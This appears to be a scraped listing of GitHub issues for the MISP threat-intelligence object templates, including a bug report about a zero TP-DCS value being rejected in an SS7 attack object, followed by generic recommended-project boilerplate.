Change the requirement fields with json schema keys
Create an object template from the most-wanted fbi record
Create an object template from the most-wanted fbi record
Registry-key objects
While trying to create a Registry-Key Object:
HTTP header object (based on the referer case)
HTTP header object (based on the referer case)
SS7 MAP
SS7 MAP
MapSmsTP-DCS value set to 0 is considered as empty value
In the object Ss7-attack when I try to add a TP-DCS with value 0, MISP is returning the following error:
Could not save object as at least one attribute has failed validation (MapSmsTP-DCS). {"value":["Value cannot be empty."]}
Category selected is "Other" by default for the field.
When I validate the object without the field then try to edit it again to add MapSmsTP-DCS with value 0, no error is displayed but the field addition is silently dropped.
New object for RTIR ticket
New object for RTIR ticket
Netflow v5/v9 object
Netflow v5/v9 object
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.